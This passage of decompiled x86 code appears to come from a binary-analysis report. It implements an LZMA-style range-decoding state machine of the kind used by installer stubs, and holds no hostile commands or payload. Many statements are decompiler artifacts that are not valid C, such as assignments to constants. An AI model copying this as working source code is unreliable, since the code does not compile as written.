												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
